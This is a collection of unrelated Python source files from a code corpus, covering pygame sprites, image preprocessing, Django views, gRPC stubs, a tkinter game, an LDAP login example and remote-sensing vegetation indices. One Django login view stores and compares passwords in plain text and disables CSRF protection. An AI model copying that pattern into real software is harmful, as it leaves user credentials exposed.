        pixels.replace((0, 0, 0, 255), (0, 0, 0, 0))
        del pixels  # release the surface lock before filling
        self.image.fill((255, 255, 255, alpha), None, pg.BLEND_RGBA_MULT)
def update(self):
# keeps the bubble centered on the player
self.rect.center = self.player.rect.center
# I made this
class Coinmob(Sprite):
def __init__(self, game):
# allows layering in LayeredUpdates sprite group
self._layer = MOB_LAYER
# add a groups property where we can pass all instances of this object into game groups
self.groups = game.all_sprites, game.coinmobs
Sprite.__init__(self, self.groups)
self.game = game
self.image_up = self.game.spritesheet.get_image(382, 510, 182, 123, 3)
self.image_up.set_colorkey(BLACK)
self.image_down = self.game.spritesheet.get_image(382, 635, 174, 126, 3)
self.image_down.set_colorkey(BLACK)
self.image = self.image_up
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.centerx = choice([-100, WIDTH + 100])
self.rect_top = self.rect.top
self.vx = randrange(1, 4)
if self.rect.centerx > WIDTH:
self.vx *= -1
        self.rect.y = randrange(HEIGHT // 2)  # integer division: randrange needs an integer bound
self.vy = 0
self.dy = 0.5
def update(self):
# Used Mob() movement system
self.rect.x += self.vx
self.vy += self.dy
self.rect_top = self.rect.top
if self.vy > 3 or self.vy < -3:
self.dy *= -1
center = self.rect.center
if self.dy < 0:
self.image = self.image_up
else:
self.image = self.image_down
self.rect.center = center
self.rect_top = self.rect.top
self.rect.y += self.vy
if self.rect.left > WIDTH + 100 or self.rect.right < -100:
self.kill()
|
StarcoderdataPython
|
9791849
|
<filename>preprocess.py
import numpy
import cv2
RAW_SHAPE = (160, 320, 3)
def preprocess(image):
assert(image.shape == RAW_SHAPE)
image = crop(image)
image = resize(image)
image = standardize(image)
return numpy.array(image, dtype='float32')
def crop(image):
return image[50:-30,:,:]
def resize(image):
__resize = lambda x: int(x * 0.5)
shape = image.shape
resized_wh = (__resize(shape[1]), __resize(shape[0]))
return cv2.resize(image, resized_wh)
def standardize(image):
return (image / 255.0 - 0.5) * 2.0
INPUT_SHAPE = preprocess(numpy.empty(RAW_SHAPE)).shape
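# --- Usage sketch (illustrative only; not part of the original module) ---
# A zero-filled frame stands in for a real camera image. Cropping removes 80
# rows (50 top, 30 bottom) and resizing halves both axes, so the output shape
# is (40, 160, 3).
if __name__ == '__main__':
    dummy = numpy.zeros(RAW_SHAPE, dtype='uint8')
    processed = preprocess(dummy)
    print(processed.shape, INPUT_SHAPE)  # (40, 160, 3) twice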
|
StarcoderdataPython
|
1655384
|
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from loginmodule.models import Login
@csrf_exempt
def login(request):
print ("buhuuu")
for key in request.POST:
print(key)
value = request.POST[key]
print(value)
userEmail = request.POST.get("inputEmail","")
userPassword = request.POST.get("inputPassword","")
isAdminCheck = request.POST.get("isAdminCheck","")
type = 'user'
if isAdminCheck == 'on':
type = 'admin'
try:
        # look up the user record matching the submitted email
dbUser = Login.objects.get(email = userEmail)
if dbUser.password == userPassword:
request.session['user'] = dbUser.name
request.session['userEmail'] = dbUser.email
request.session['type'] = dbUser.type
print ("db user email "+dbUser.email)
curUser = request.session.get('user', 'none')
curUserEmail = request.session.get('userEmail', 'none')
print ("printing session data "+curUser + " " +curUserEmail)
return render(request, 'mainmodule/home.html', {"userName" : dbUser.name, "userEmail" : dbUser.email})
else:
return render(request, 'mainmodule/loginerror.html')
except Login.DoesNotExist:
        # no account with that email; show the error page
return render(request, 'mainmodule/loginerror.html')
def logout(request, dumbEntry):
print ("logout entered")
curUser = request.session.get('user', 'none')
curUserEmail = request.session.get('userEmail', 'none')
print ("logout: curUser = "+curUser + ", curUserEmail = "+curUserEmail)
request.session['user'] = 'none'
request.session['userEmail'] = 'none'
request.session['type'] = 'none'
return render(request, 'mainmodule/home.html')
|
StarcoderdataPython
|
5198272
|
"""
Small library for providing unique identifier to similar exceptions
1) we check just filename and function name
2) we don't check line numbers because they often change e.g. by unrelated changes
3) we check exception type but not message as the message can often differ for similar problems
the code is public-domain
written by <NAME>
"""
import os
import re
import sys
import hashlib
EXC_MAPPING = {
AttributeError: r"'(\w+)' object has no attribute '(\w+)'",
}
def _get_exception_attributes(exc_class, exc):
regex = EXC_MAPPING.get(exc_class)
if not regex:
return []
match = re.fullmatch(regex, str(exc))
if not match:
return []
return match.groups()
def format_exception(exc_info=None, root=None):
if not exc_info:
exc_info = sys.exc_info()
exc_class, exc, traceback = exc_info
rows = []
while traceback:
code = traceback.tb_frame.f_code
filename = code.co_filename
if root:
filename = os.path.relpath(filename, root)
if not rows or rows[-1] != (filename, code.co_name):
rows.append((filename, code.co_name))
traceback = traceback.tb_next
rows.append(exc_class.__name__)
attributes = _get_exception_attributes(exc_class, exc)
rows.extend(attributes)
return rows
def exception_id(**kwargs):
return hashlib.md5(str(format_exception(**kwargs)).encode()).hexdigest()
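# --- Usage sketch (illustrative only; not part of the original module) ---
# Two failures with the same call chain and exception type hash to the same
# id even when line numbers or messages differ; the filename shown is whatever
# script runs this block.
if __name__ == '__main__':
    try:
        {}.missing  # AttributeError: 'dict' object has no attribute 'missing'
    except AttributeError:
        print(format_exception())  # e.g. [('script.py', '<module>'), 'AttributeError', 'dict', 'missing']
        print(exception_id())      # stable md5 hex digest for this failure class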
|
StarcoderdataPython
|
142418
|
<gh_stars>1-10
from django.shortcuts import redirect
def unauthenticated_user_only(view_func):
def wrapper(request):
if request.user.is_authenticated:
return redirect('index')
return view_func(request)
return wrapper
def authenticated_user_only(view_func):
def wrapper(request):
if request.user.is_authenticated:
return view_func(request)
return redirect('login')
return wrapper
def chat(view_func):
def wrapper(request, username):
if not request.user.is_authenticated:
return redirect('login')
if username == request.user.username:
return redirect('index')
return view_func(request, username)
return wrapper
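# --- Usage sketch (hypothetical view functions, for illustration only) ---
from django.http import HttpResponse

@unauthenticated_user_only
def login_view(request):
    # reachable only while anonymous; logged-in users are redirected to 'index'
    return HttpResponse('login page')

@authenticated_user_only
def dashboard(request):
    # reachable only while logged in; anonymous users are redirected to 'login'
    return HttpResponse('dashboard')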
|
StarcoderdataPython
|
1762892
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2
import pysolveengine.svc_jobs_pb2 as svc__jobs__pb2
class JobStub(object):
"""A service for creating new jobs with the solveEngine
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Create = channel.unary_unary(
'/solver.jobs.Job/Create',
request_serializer=svc__jobs__pb2.CreateJobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.CreateJobResponse.FromString,
)
self.Status = channel.unary_unary(
'/solver.jobs.Job/Status',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.JobStatus.FromString,
)
self.GetJobs = channel.unary_unary(
'/solver.jobs.Job/GetJobs',
request_serializer=svc__jobs__pb2.ListRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.JobList.FromString,
)
self.Schedule = channel.unary_unary(
'/solver.jobs.Job/Schedule',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GetInput = channel.unary_unary(
'/solver.jobs.Job/GetInput',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.InputResponse.FromString,
)
self.GetResults = channel.unary_unary(
'/solver.jobs.Job/GetResults',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=svc__jobs__pb2.ResultResponse.FromString,
)
self.Stop = channel.unary_unary(
'/solver.jobs.Job/Stop',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Delete = channel.unary_unary(
'/solver.jobs.Job/Delete',
request_serializer=svc__jobs__pb2.JobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class JobServicer(object):
"""A service for creating new jobs with the solveEngine
"""
def Create(self, request, context):
"""Create a new job for solving, it doesn't schedule the job
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Status(self, request, context):
"""View the job status
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetJobs(self, request, context):
"""List users' jobs
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Schedule(self, request, context):
"""Schedule a job for solving
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetInput(self, request, context):
"""Get job input files
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetResults(self, request, context):
"""Get job result files
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Stop a running job
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Delete job
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_JobServicer_to_server(servicer, server):
rpc_method_handlers = {
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=svc__jobs__pb2.CreateJobRequest.FromString,
response_serializer=svc__jobs__pb2.CreateJobResponse.SerializeToString,
),
'Status': grpc.unary_unary_rpc_method_handler(
servicer.Status,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=svc__jobs__pb2.JobStatus.SerializeToString,
),
'GetJobs': grpc.unary_unary_rpc_method_handler(
servicer.GetJobs,
request_deserializer=svc__jobs__pb2.ListRequest.FromString,
response_serializer=svc__jobs__pb2.JobList.SerializeToString,
),
'Schedule': grpc.unary_unary_rpc_method_handler(
servicer.Schedule,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GetInput': grpc.unary_unary_rpc_method_handler(
servicer.GetInput,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=svc__jobs__pb2.InputResponse.SerializeToString,
),
'GetResults': grpc.unary_unary_rpc_method_handler(
servicer.GetResults,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=svc__jobs__pb2.ResultResponse.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=svc__jobs__pb2.JobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'solver.jobs.Job', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
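# --- Client usage sketch (illustrative; not part of the generated code) ---
# Assumes a server listening on localhost:50051 (hypothetical address). The
# request message is built empty because its fields are defined in the .proto
# file, which is not shown here.
def _example_list_jobs():
    channel = grpc.insecure_channel('localhost:50051')
    stub = JobStub(channel)
    return stub.GetJobs(svc__jobs__pb2.ListRequest())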
|
StarcoderdataPython
|
99777
|
from tkinter import *
import time
import random
root = Tk()
root.title("bb")
root.geometry("450x570")
root.resizable(0, 0)
root.wm_attributes("-topmost", 1)
canvas = Canvas(root, width=600, height=600, bd=0, highlightthickness=0, highlightbackground="white", bg="Black")
canvas.pack(padx=10, pady=10)
score = Label(height=0, width=0, font="Consolas 14 bold")
score.pack(side="left")
root.update()
class B:
def __init__(self, canvas, color, paddle, bricks, score):
self.bricks = bricks
self.canvas = canvas
self.paddle = paddle
self.score = score
self.bottom_hit = False
self.hit = 0
self.id = canvas.create_oval(10, 10, 25, 25, fill=color, width=1)
self.canvas.move(self.id, 230, 461)
start = [4, 3.8, 3.6, 3.4, 3.2, 3, 2.8, 2.6]
random.shuffle(start)
#print(start)
self.x = start[0]
self.y = -start[0]
self.canvas.move(self.id, self.x, self.y)
self.canvas_height = canvas.winfo_height()
self.canvas_width = canvas.winfo_width()
def brick_hit(self, pos):
for brick_line in self.bricks:
for brick in brick_line:
brick_pos = self.canvas.coords(brick.id)
#print(brick_pos)
try:
if pos[2] >= brick_pos[0] and pos[0] <= brick_pos[2]:
if pos[3] >= brick_pos[1] and pos[1] <= brick_pos[3]:
canvas.bell()
self.hit += 1
self.score.configure(text="Score: " + str(self.hit))
self.canvas.delete(brick.id)
return True
                except IndexError:
                    # brick already deleted; its coords list is empty
                    continue
return False
def paddle_hit(self, pos):
paddle_pos = self.canvas.coords(self.paddle.id)
if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:
if pos[3] >= paddle_pos[1] and pos[1] <= paddle_pos[3]:
#print("paddle hit")
return True
return False
def draw(self):
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id)
#print(pos)
start = [4, 3.8, 3.6, 3.4, 3.2, 3, 2.8, 2.6]
random.shuffle(start)
if self.brick_hit(pos):
self.y = start[0]
if pos[1] <= 0:
self.y = start[0]
if pos[3] >= self.canvas_height:
self.bottom_hit = True
if pos[0] <= 0:
self.x = start[0]
if pos[2] >= self.canvas_width:
self.x = -start[0]
if self.paddle_hit(pos):
self.y = -start[0]
class Paddle:
def __init__(self, canvas, color):
self.canvas = canvas
        self.id = canvas.create_rectangle(0, 0, 200, 30, fill=color)  # paddle dimensions
        self.canvas.move(self.id, 200, 485)  # move the paddle to its starting position
self.x = 0
self.pausec=0
self.canvas_width = canvas.winfo_width()
        self.canvas.bind_all("<Left>", self.turn_left)  # left arrow key moves the paddle left
        self.canvas.bind_all("<Right>", self.turn_right)  # right arrow key moves the paddle right
#self.canvas.bind_all("<space>", self.pauser)
def draw(self):
pos = self.canvas.coords(self.id)
#print(pos)
if pos[0] + self.x <= 0:
self.x = 0
if pos[2] + self.x >= self.canvas_width:
self.x = 0
self.canvas.move(self.id, self.x, 0)
def turn_left(self, event):
self.x = -3.5
def turn_right(self, event):
self.x = 3.5
def pauser(self,event):
self.pausec+=1
if self.pausec==2:
self.pausec=0
class Bricks:
def __init__(self, canvas, color):
self.canvas = canvas
self.id = canvas.create_oval(5, 5, 25, 25, fill=color, width=2)
playing = False  # the game starts idle; press Enter to begin
def start_game(event):
global playing
if playing is False:
playing = True
score.configure(text="Score: 00")
canvas.delete("all")
BALL_COLOR = ["green", "green", "green"]
        BRICK_COLOR = ["black", "black", "black"]  # colors for the brick rows drawn above the paddle
random.shuffle(BALL_COLOR)
paddle = Paddle(canvas, "blue")
bricks = []
for i in range(0, 5):
b = []
for j in range(0, 19):
random.shuffle(BRICK_COLOR)
tmp = Bricks(canvas, BRICK_COLOR[0])
b.append(tmp)
bricks.append(b)
for i in range(0, 5):
for j in range(0, 19):
canvas.move(bricks[i][j].id, 25 * j, 25 * i)
ball = B(canvas, BALL_COLOR[0], paddle, bricks, score)
root.update_idletasks()
root.update()
time.sleep(1)
while 1:
if paddle.pausec !=1:
try:
canvas.delete(m)
del m
except:
pass
if not ball.bottom_hit:
ball.draw()
paddle.draw()
root.update_idletasks()
root.update()
time.sleep(0.01)
if ball.hit==95:
canvas.create_text(250, 250, text="YOU WON !!", fill="yellow", font="Consolas 24 ")
root.update_idletasks()
root.update()
playing = False
break
else:
canvas.create_text(250, 250, text="GAME OVER!!", fill="red", font="Consolas 24 ")
root.update_idletasks()
root.update()
playing = False
break
else:
                try:
                    m  # pause text already on screen; do nothing
                except NameError:
                    m=canvas.create_text(250, 250, text="PAUSE!!", fill="green", font="Consolas 24 ")
root.update_idletasks()
root.update()
root.bind_all("<Return>", start_game)
canvas.create_text(250, 250, text="To start press enter", fill="red", font="Consolas 18")
j=canvas.find_all()
root.mainloop()
|
StarcoderdataPython
|
6415639
|
<gh_stars>0
import os
import logging
TEST_FLAG = os.environ.get("TEST_FLAG")
environment = os.environ.get("environment")
def determine_environment(environment):
logging.info("The environment is " + environment)
if TEST_FLAG == "true" and environment != "bad":
if os.system("vagrant up unit_test") !=0:
logging.exception("Unittest failed")
else:
os.system("vagrant destroy unit_test")
return True
elif environment == "development":
logging.info("Depploying the development environment")
if os.system("vagrant up development-vm1") !=0:
logging.exception("Vagrant failed to deploy")
if os.system("vagrant up development-vm2") !=0:
logging.exception("Vagrant failed to deploy")
else:
return True
elif environment == "main":
if os.system("vagrant up main-vm1") !=0:
logging.exception("Vagrant failed to deploy")
if os.system("vagrant up main-vm2") !=0:
logging.exception("Vagrant failed to deploy")
else:
return True
elif environment == "production":
if os.system("vagrant up production-vm1") !=0:
logging.exception("Vagrant failed to deploy")
if os.system("vagrant up production-vm2") !=0:
logging.exception("Vagrant failed to deploy")
else:
return True
else:
logging.exception("The wrong environment was called")
if __name__ == "__main__":
determine_environment(environment)
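# Usage sketch (illustrative): the script is driven entirely by environment
# variables, e.g.
#   TEST_FLAG=true environment=development python deploy.py   # hypothetical filename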
|
StarcoderdataPython
|
331896
|
import numpy as np
import matplotlib.pyplot as pl
import pysir
import time
from tqdm import tqdm
l = [['200,201',-500,10,1500]]
SIR = pysir.SIR(l)
psf = np.loadtxt('PSF.dat', dtype=np.float32)
SIR.set_PSF(psf[:,0].flatten(), psf[:,1].flatten())
out = np.loadtxt('model.mod', dtype=np.float32, skiprows=1)[:,0:8]
out = np.delete(out, 2, axis=1)
departure = np.ones((2, SIR.nLines, out.shape[0]), dtype=np.float32)
stokes, rf = SIR.synthesize(out, departure=departure)
nz = out.shape[0]
rf_numerical = np.zeros((4, SIR.nLambda, nz))
for i in tqdm(range(nz)):
out_new = np.copy(out)
out_new[i,1] += 1.0
stokes_new = SIR.synthesize(out_new, departure=departure, returnRF=False)
rf_numerical[:,:,i] = (stokes_new[1:,:] - stokes[1:,:]) / 1.0
f, ax = pl.subplots(ncols=4, nrows=3, figsize=(16,8))
for i in range(4):
ax[0,i].plot(stokes[0,:], stokes[i+1,:])
im = ax[1,i].imshow(rf[0][i,:,:].T)
pl.colorbar(im, ax=ax[1,i])
im = ax[2,i].imshow(rf_numerical[i,:,:].T)
pl.colorbar(im, ax=ax[2,i])
# pl.tight_layout()
pl.show()
# start = time.time()
# for i in range(50):
# stokes, rf = pysir.synthesize(out, returnRF=True)
# print('Elapsed time 50 synthesis : {0} s'.format(time.time()-start))
|
StarcoderdataPython
|
11202051
|
<reponame>AsafBarZvi/MSc_project
import time
import numpy as np
class Timer:
def __init__(self,name):
self._name = name
self._tstarts = []
self._tends = []
def __enter__(self):
if len(self._tstarts) < 3000:
self._tstarts.append(time.time())
return self
def __exit__(self,exc_type, exc_value, traceback):
if len(self._tends) < 3000:
self._tends.append(time.time())
def stats(self):
if (len(self._tstarts) == 0) or (len(self._tends) == 0):
return 0 , 0 , 0
starts = np.array(self._tstarts)
ends = np.array(self._tends)
return np.mean(ends - starts) , np.std(ends - starts) , np.max(ends - starts)
timer_dict = dict(train = Timer('train'),
summary = Timer('summary'))
def timerStats():
    for n, t in timer_dict.items():
        print("TIMER {:s} stats: mean {:.6f} , std {:.6f} , max {:.6f}".format(n, *t.stats()))
|
StarcoderdataPython
|
6419410
|
<filename>teacher/models.py
from django.db import models
# from subject.models import Subject
from department.models import Department
# Create your models here.
class Teacher(models.Model):
    name = models.CharField(max_length=200)
    teacher_bio = models.TextField(max_length=5000)
    # subject = models.OneToOneField(
    #     Subject,
    #     on_delete=models.DO_NOTHING
    # )
    department = models.OneToOneField(
        Department,
        on_delete=models.DO_NOTHING
    )
def __str__(self):
return self.name
|
StarcoderdataPython
|
9756712
|
<filename>tests/basics/bool1.py
# tests for bool objects
# basic logic
print(not False)
print(not True)
print(False and True)
print(False or True)
# unary operators
print(+True)
print(-True)
|
StarcoderdataPython
|
6694339
|
<gh_stars>100-1000
from specs import BaseTest
class IndexesTest(BaseTest):
def setUp(self):
super().setUp()
self.helper_indexes_testdata_prepare()
def test_get_indexes(self):
"""Should be able to get indexes list"""
status, body = self.api_get_indexes(self.current_db, self.current_ns)
self.validate_get_list_response(status, body, 'Indexes')
def test_create_indexes(self):
"""Should be able to create indexes"""
count = 5
indexes_arr_of_dicts = self.helper_index_array_construct(count)
for i in range(0, count):
status, body = self.api_create_index(
self.current_db, self.test_ns, indexes_arr_of_dicts[i])
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, indexes_arr_of_dicts)
def test_delete_index(self):
"""Should be able to delete an index"""
count = 5
indexes_arr_of_dicts = self.helper_index_array_construct(count)
for i in range(0, count):
status, body = self.api_create_index(
self.current_db, self.test_ns, indexes_arr_of_dicts[i])
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, indexes_arr_of_dicts)
first_index = indexes_arr_of_dicts[0]
first_index_name = first_index['name']
status, body = self.api_delete_index(
self.current_db, self.test_ns, first_index_name)
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, indexes_arr_of_dicts[1:])
def test_update_index(self):
"""Should be able to update an index"""
index = self.helper_index_construct(
name='id', field_type='int', index_type='hash', is_pk=True)
status, body = self.api_create_index(
self.current_db, self.test_ns, index)
self.assertEqual(True, status == self.API_STATUS['success'], body)
index_dict = []
index_dict.append(index)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, index_dict)
updated_index = self.helper_index_construct(
name='id', field_type='double', index_type='tree', is_pk=True)
updated_index_dict = []
updated_index_dict.append(updated_index)
status, body = self.api_update_index(
self.current_db, self.test_ns, updated_index)
self.assertEqual(True, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(status, body, updated_index_dict)
def test_update_index_to_string(self):
"""Should not be able to update an index to string type"""
index = self.helper_index_construct(
name='id', field_type='int', index_type='hash', is_pk=True)
status, body = self.api_create_index(
self.current_db, self.test_ns, index)
self.assertEqual(True, status == self.API_STATUS['success'], body)
index_dict = []
index_dict.append(index)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(
status, body, index_dict)
updated_index = self.helper_index_construct(
name='id', field_type='string', index_type='hash', is_pk=True)
updated_index_dict = []
updated_index_dict.append(updated_index)
status, body = self.api_update_index(
self.current_db, self.test_ns, updated_index)
self.assertEqual(False, status == self.API_STATUS['success'], body)
status, body = self.api_get_namespace(self.current_db, self.test_ns)
self.validate_get_namespace_response(status, body, index_dict)
|
StarcoderdataPython
|
8155634
|
from client_of_redundant_servers.client_of_redundant_ad_ldap_servers import ClientOfRedundantAdLdapServers
from client_of_redundant_servers.client_of_redundant_servers import AllAvailableServersFailed
from collections import OrderedDict
LDAP_SERVERS = OrderedDict()
LDAP_SERVERS['srvr-dc1.myad.private.example.com'] = {'port': 636,
'ssl': True,
'validate': True}
LDAP_SERVERS['srvr-dc2.myad.private.example.com'] = {'port': 636,
'ssl': True,
'validate': True}
LDAP_AD_DOMAIN = 'myad'
LDAP_SEARCH_BASE = 'ou=Users,ou=MyOrg,dc=myad,dc=private,dc=example,dc=com'
servers = ClientOfRedundantAdLdapServers(server_dict=LDAP_SERVERS,
ad_domain=LDAP_AD_DOMAIN,
ldap_search_base=LDAP_SEARCH_BASE)
ldap_uid = 'test'
ldap_pass = '<PASSWORD>'
try:
auth_user = servers.ldap_auth(ldap_uid, ldap_pass)
if auth_user:
print("Accepted")
else:
print("Rejected")
except AllAvailableServersFailed:
print("Error: no servers available")
|
StarcoderdataPython
|
1643273
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 10 17:48:34 2020
@author: rcard
"""
#The next 3 lines select between inline plots and plots in a new window
#Useful for rlocus
from IPython import get_ipython
get_ipython().run_line_magic('matplotlib', 'qt')
#get_ipython().run_line_magic('matplotlib', 'inline')
import numpy as np #Library for numerical computing
import math #Math functions
import matplotlib.pyplot as plt # MATLAB-like plotting functions
import control as ctrl # Control systems library
from control.matlab import * # MATLAB-like control functions
#Plant
num=[4]
den=[1, 0.5, 0]
G=tf(num,den)
print(G)
#Uncompensated plant in closed loop
Gmf=feedback(G,1)
#Closed-loop poles without compensation
print(pole(Gmf))
#Compensator
numc=[1.13, 6.4749, 1.2498]
denc=[1, 0]
Gc=tf(numc,denc)
print(Gc)
#Compensated plant in closed loop
Gmfc=feedback(Gc*G,1)
#Closed-loop poles of the compensated system
print(pole(Gmfc))
#Step response
t=np.linspace(0,25,1000)
y1, t1 = step(Gmf,t)
y2, t2 = step(Gmfc,t)
plt.figure()
plt.plot(t1,y1,t2,y2)
plt.title('Step response')
plt.legend(('Without compensation', 'With compensation'))
plt.xlabel('t(s)')
plt.ylabel('Amplitude')
plt.grid()
#Root locus of the plant and of the compensated plant
rlocus(G)
rlocus(Gc*G)
#Ramp response
Gi=tf([1],[1, 0]);
T=np.linspace(0,50,1000)
y3, t3 = step(Gi,T)
y4, t4 = step(Gi*Gmf,T)
y5, t5 = step(Gi*Gmfc,T)
plt.figure()
plt.plot(t3,y3,t4,y4,t5,y5)
plt.title('Ramp response')
plt.legend(('Reference', 'Gmf', 'Gmfc'))
plt.xlabel('t(s)')
plt.ylabel('Amplitude')
plt.grid()
#Tracking errors (y3..y5 already hold the ramp responses computed above)
erro_MF=y3-y4
erro_MF_C=y3-y5
plt.figure()
plt.plot(T,erro_MF,T,erro_MF_C)
plt.title('Tracking error for a ramp reference')
plt.legend(('Without compensation', 'With compensation'))
plt.xlabel('t(s)')
plt.ylabel('Amplitude')
plt.grid()
|
StarcoderdataPython
|
3521327
|
#!/usr/bin/env python
"""
@authors: <NAME>, <NAME>
Date Created: 9/24/2011
"""
from __future__ import division, print_function
from future.utils import iteritems, viewitems
from builtins import int
import os
import sys
import subprocess
import time
from copy import copy
import multiprocessing as mpr
import argparse
import fnmatch
from collections import OrderedDict
# MapPy
try:
from . import raster_tools
except:
import raster_tools
from . import utils
from .errors import logger
from .helpers import _iteration_parameters
# Numpy
try:
import numpy as np
except ImportError:
raise ImportError('NumPy must be installed')
# Numexpr
try:
    import numexpr as ne
    ne.set_num_threads(mpr.cpu_count())
    numexpr_installed = True
except ImportError:
    numexpr_installed = False
# Carray
# try:
# import carray as ca
# carray_installed = True
# except:
# carray_installed = False
# GDAL
try:
from osgeo import gdal
from osgeo.gdalconst import *
except ImportError:
raise ImportError('GDAL must be installed')
# Scikit-image
try:
from skimage.exposure import rescale_intensity
except ImportError:
raise ImportError('Scikit-image must be installed')
try:
import deprecation
except ImportError:
raise ImportError('deprecation must be installed (pip install deprecation)')
old_settings = np.seterr(all='ignore')
class SensorInfo(object):
"""
A class to hold sensor names, wavelengths, and equations.
"""
def __init__(self):
self.sensors = utils.SUPPORTED_SENSORS
self.band_orders = utils.SENSOR_BAND_DICT
# The wavelengths needed to compute the index.
# The wavelengths are loaded in order, so the
# order should match the equations in
# ``self.equations``.
self.wavelength_lists = utils.VI_WAVELENGTHS
# The vegetation index equations. The arrays are
# loaded from ``self.wavelength_lists``. For example,
# ``array01`` of 'ARVI' would be the 'blue' wavelength.
self.equations = \
{'ARVI': '((array03 / scale_factor) - ((array02 / scale_factor) - '
'y*((array01 / scale_factor) - (array02 / scale_factor)))) / '
'((array03 / scale_factor) + ((array02 / scale_factor) - '
'y*((array01 / scale_factor) - (array02 / scale_factor))))',
'BRIGHT': '((array01 / scale_factor)**2 + (array02 / scale_factor)**2 + (array03 / scale_factor)**2 + (array04 / scale_factor)**2)**0.5',
'CBI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'CIRE': '((array02 / scale_factor) / (array01 / scale_factor)) - 1.',
'EVI': 'g * (((array03 / scale_factor) - (array02 / scale_factor)) / '
'((array03 / scale_factor) + (c1 * (array02 / scale_factor)) - '
'(c2 * (array01 / scale_factor)) + L))',
'EVI2': 'g * (((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + L + (c1 * (array01 / scale_factor))))',
'IPVI': '(array02 / scale_factor) / ((array02 / scale_factor) + (array01 / scale_factor))',
'MSAVI': '((2 * array02 + 1) - ((((2 * array02 + 1)**2) - (8 * (array02 - array01)))**.5)) / 2',
'GNDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'MNDWI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDSI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDBAI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NBRI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDII': '(array03 - array02 + array01) / (array03 + array02 + array01)',
'NDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'RENDVI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
'NDWI': '((array02 / scale_factor) - (array01 / scale_factor)) / '
'((array02 / scale_factor) + (array01 / scale_factor))',
